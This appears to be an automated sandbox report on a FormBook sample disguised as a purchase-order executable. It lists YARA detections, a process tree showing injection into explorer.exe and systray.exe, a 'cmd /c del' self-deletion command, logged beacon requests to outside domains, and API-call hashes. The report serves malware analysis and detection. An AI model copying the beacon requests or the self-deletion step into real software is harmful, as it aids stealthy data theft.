                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                7192.168.2.549729160.153.136.380C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:34:28.232156038 CEST5743OUTGET /uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut HTTP/1.1
                                                                                Host: www.bigbuddyco.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:34:28.263297081 CEST5743INHTTP/1.1 302 Found
                                                                                Connection: close
                                                                                Pragma: no-cache
                                                                                cache-control: no-cache
                                                                                Location: /uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                8192.168.2.549730209.99.40.22280C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:34:34.094811916 CEST5744OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=tU/VEHnNkxFTtqdl9k3gLUVMI1i9B27PVJzZPsc0LQ26xNvAL6WXm+9T7cql/MYM9rc5 HTTP/1.1
                                                                                Host: www.agarkovsport.online
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:34:34.314126968 CEST5745INHTTP/1.1 200 OK
                                                                                Date: Thu, 08 Apr 2021 11:34:34 GMT
                                                                                Server: Apache
                                                                                Set-Cookie: vsid=918vr3654272741917697; expires=Tue, 07-Apr-2026 11:34:34 GMT; Max-Age=157680000; path=/; domain=www.agarkovsport.online; HttpOnly
                                                                                Content-Length: 272
                                                                                Keep-Alive: timeout=5, max=125
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 31 38 29 3c 2f 68 33 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (18)</h3></div></body></html>


                                                                                Code Manipulations

                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Start time:13:32:31
                                                                                Start date:08/04/2021
                                                                                Path:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
                                                                                Imagebase:0xa10000
                                                                                File size:532480 bytes
                                                                                MD5 hash:3A480D8D735EFE129DCCCEA48A054721
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                General

                                                                                Start time:13:32:41
                                                                                Start date:08/04/2021
                                                                                Path:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                Imagebase:0x450000
                                                                                File size:532480 bytes
                                                                                MD5 hash:3A480D8D735EFE129DCCCEA48A054721
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:low

                                                                                General

                                                                                Start time:13:32:44
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff693d90000
                                                                                File size:3933184 bytes
                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:13:33:00
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\systray.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\systray.exe
                                                                                Imagebase:0x10c0000
                                                                                File size:9728 bytes
                                                                                MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:13:33:04
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:/c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
                                                                                Imagebase:0x130000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:13:33:05
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7ecfc0000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >

                                                                                  Executed Functions

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ea1ca3677ad5f69b57a6a75714f5fdcafd1aab6ee9e987621657c642738b7114
                                                                                  • Instruction ID: 8533e41c2333ce9f950ed7182c894765af34f257cb3283f9ea9c7d6990516a77
                                                                                  • Opcode Fuzzy Hash: ea1ca3677ad5f69b57a6a75714f5fdcafd1aab6ee9e987621657c642738b7114
                                                                                  • Instruction Fuzzy Hash: 12527C31A00729CFDB15CF58C888BAAB7F6FF45318F4584A9D919AB291D770ED85CB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e1047184067162e14ff1742d78649b50963341ee5c86af21c7ff7c6efedb157c
                                                                                  • Instruction ID: 56e18f5481b901f6d2f7ff6e45acea5fd290a18baa0fdb79c1e38b6ac8d95fd5
                                                                                  • Opcode Fuzzy Hash: e1047184067162e14ff1742d78649b50963341ee5c86af21c7ff7c6efedb157c
                                                                                  • Instruction Fuzzy Hash: 9F91A234E003298FCB14DFA4D8589DDB7BAFF89304F558625E516AB3A4EB70A845CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aef90f1be54204406606d940b0b14c697a0087cb39ce695ba247c7739806bed5
                                                                                  • Instruction ID: 18529f4f4e3d89b90b3994b1f86f909bbc8685d57be76a71ebe3c6979acfd14f
                                                                                  • Opcode Fuzzy Hash: aef90f1be54204406606d940b0b14c697a0087cb39ce695ba247c7739806bed5
                                                                                  • Instruction Fuzzy Hash: 8281A035E003198FCB15DFE4D8548DDBBBAFF89304F108625E516AB2A4EB70A849CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 013E6AB0
                                                                                  • GetCurrentThread.KERNEL32 ref: 013E6AED
                                                                                  • GetCurrentProcess.KERNEL32 ref: 013E6B2A
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 013E6B83
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: 470e3fd8ce1efe29baed98c3861589a0ad798057a4e80779cad9facd684b3d1d
                                                                                  • Instruction ID: 6c22e392f95cd5b35a8f952da35710d4b444827d207378c58f5a6a73aa0fa0d4
                                                                                  • Opcode Fuzzy Hash: 470e3fd8ce1efe29baed98c3861589a0ad798057a4e80779cad9facd684b3d1d
                                                                                  • Instruction Fuzzy Hash: 055174B49003498FDB04CFAAD549B9EBBF0BF49318F14846AE418A7390D7349848CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 013E6AB0
                                                                                  • GetCurrentThread.KERNEL32 ref: 013E6AED
                                                                                  • GetCurrentProcess.KERNEL32 ref: 013E6B2A
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 013E6B83
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: e1b030cdfe311304df3d40e6808fc7f59c86c03c2e80818070b1ef9002f21b45
                                                                                  • Instruction ID: a2a4b5e2d61bc883f776e2f2a1a97d5ae3c148a444fdb33706332e9ff9af3838
                                                                                  • Opcode Fuzzy Hash: e1b030cdfe311304df3d40e6808fc7f59c86c03c2e80818070b1ef9002f21b45
                                                                                  • Instruction Fuzzy Hash: 525152B4D003498FDB14CFAAD548BDEBBF0BF49318F248469E419A7390D774A888CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 42bf2519305b680b354c1a43fb3ab483e61d38339b26a4359e60b39f3935377b
                                                                                  • Instruction ID: 76139b0ace6cc4888679ebb3fd51ba7771772f6e7d6ccad9d7c3443dcb1b41b6
                                                                                  • Opcode Fuzzy Hash: 42bf2519305b680b354c1a43fb3ab483e61d38339b26a4359e60b39f3935377b
                                                                                  • Instruction Fuzzy Hash: 9F815870A00B158FDB25DF29D44979ABBF5FF88208F00892ED486DBA84D735E845CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013EE02A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 64ea9eff939c3ab3c8d8e3bfb1394e069e6094449cbbe933451434b268a46ab2
                                                                                  • Instruction ID: 184c2377c29a0d64470f42d28d078a9645b30c12cc48e1f1c3cddacdd8684bad
                                                                                  • Opcode Fuzzy Hash: 64ea9eff939c3ab3c8d8e3bfb1394e069e6094449cbbe933451434b268a46ab2
                                                                                  • Instruction Fuzzy Hash: BB51C0B1D003189FDB14CFAAC884ADEBFF5BF48314F25812AE819AB250D7759945CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013EE02A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 93dce218060dbe582a336f5c82fd310bcde728375065b1ea96761c54ee55f1a9
                                                                                  • Instruction ID: c4f2019a10d0699edfd7008750182672e138dc2055d2864f3202e9785b785133
                                                                                  • Opcode Fuzzy Hash: 93dce218060dbe582a336f5c82fd310bcde728375065b1ea96761c54ee55f1a9
                                                                                  • Instruction Fuzzy Hash: 5641CFB1D003199FDB14CF9AC884ADEBFF5BF48314F24862AE819AB250D7759945CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E7107
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: ee15635addccd15aef972b27d193bf0cf29fc5d0ee4c2f41956851af7ee0e63b
                                                                                  • Instruction ID: 8642c8e7165bf27d728ccb9eaec393393820fa097096a8c85a94e3053c26b3c4
                                                                                  • Opcode Fuzzy Hash: ee15635addccd15aef972b27d193bf0cf29fc5d0ee4c2f41956851af7ee0e63b
                                                                                  • Instruction Fuzzy Hash: 14416876900319AFCB01CF99D844AEEBFF9FB88314F14802AE915A7360C3759955CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 05483DF1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.254723941.0000000005480000.00000040.00000001.sdmp, Offset: 05480000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 886508f8f255455b75744fd4f2245f619973e6c2e3729054c1fe0f6e7ea14892
                                                                                  • Instruction ID: 01559b8fd43c2760e5560b1719a10ec2fd6fd7142ee430d278604383d6bb3667
                                                                                  • Opcode Fuzzy Hash: 886508f8f255455b75744fd4f2245f619973e6c2e3729054c1fe0f6e7ea14892
                                                                                  • Instruction Fuzzy Hash: D2410471C0431CCBDB24DFA9C8887EEBBB1BF48704F11856AD509AB251D775694ACF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05480D91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.254723941.0000000005480000.00000040.00000001.sdmp, Offset: 05480000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CallProcWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2714655100-0
                                                                                  • Opcode ID: 2210f5aa72e187e0ad90524d15e3ad0adeeb95967b1879a310cbcf2d44c98120
                                                                                  • Instruction ID: f7d68a0d51560031655dbce5e34abb585d312e4b3bcd33558f1c780f083a5eeb
                                                                                  • Opcode Fuzzy Hash: 2210f5aa72e187e0ad90524d15e3ad0adeeb95967b1879a310cbcf2d44c98120
                                                                                  • Instruction Fuzzy Hash: FB4129B8910209DFCB14DF99C488BAEBBF5FB89314F15845AD519AB321D334A845CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E7107
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: d4769eca30886a886604489463cf89f7e20b638865f9bc37b1dd2acad8f90184
                                                                                  • Instruction ID: 321fb8e400ea53a34cda2e1e2c726c31f4468f617327fc6e48b2bf6913b062b0
                                                                                  • Opcode Fuzzy Hash: d4769eca30886a886604489463cf89f7e20b638865f9bc37b1dd2acad8f90184
                                                                                  • Instruction Fuzzy Hash: 2F21F4B5900318AFDB10CF99D884ADEBBF4EB48324F14841AE914A7350D374A954CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E7107
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 4e1b0ce139ce3172ad12cae2a0f00a02a69a5da55a2e9d4db6f9acf91c56464c
                                                                                  • Instruction ID: e674d646e0daae011b997e274859b142c2fe79b65fd8f48dbaa07f5d9fe54dfe
                                                                                  • Opcode Fuzzy Hash: 4e1b0ce139ce3172ad12cae2a0f00a02a69a5da55a2e9d4db6f9acf91c56464c
                                                                                  • Instruction Fuzzy Hash: C121F3B5900318AFDB10CFAAD884ADEFBF8FB48324F14841AE954A3350D374A954CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EBD21,00000800,00000000,00000000), ref: 013EBF32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 423baa2cfcb3d6becb9c7ec264c688507bb30975de24b150b25574262632a1dd
                                                                                  • Instruction ID: d1093bd5f22f42a4e82c7e0cc17ea9aa4691ec0299dc0678ba3d9845b70d24ec
                                                                                  • Opcode Fuzzy Hash: 423baa2cfcb3d6becb9c7ec264c688507bb30975de24b150b25574262632a1dd
                                                                                  • Instruction Fuzzy Hash: F21144B28043188FCB10CF9AD448BDEFBF4EB88324F05842EE915A7240C375A949CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EBD21,00000800,00000000,00000000), ref: 013EBF32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 080476130425107f717fb99e879984c5a755d3335944c066835b5fed7fa2595f
                                                                                  • Instruction ID: 13741bc7f6235f1785e0e02922dae547ace06560f06e08e3976b7d015fc9803a
                                                                                  • Opcode Fuzzy Hash: 080476130425107f717fb99e879984c5a755d3335944c066835b5fed7fa2595f
                                                                                  • Instruction Fuzzy Hash: 452144B28003198FCB10CF9AD848ADEFBF4BB98314F15852EE515A7240C375A54ACFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 013EBCA6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 622b131de42024a2b5c3d9b9460cb166181d042bc746e01ebe4c8d37dc551945
                                                                                  • Instruction ID: 33b93c39d51bb34e353ad89d1ffa9a2602cbd1c9493e41f311fc00796aad722e
                                                                                  • Opcode Fuzzy Hash: 622b131de42024a2b5c3d9b9460cb166181d042bc746e01ebe4c8d37dc551945
                                                                                  • Instruction Fuzzy Hash: C51113B5C003198FDB10CF9AC448BDEFBF8AB89224F15841AD829B7600C375A549CFA1
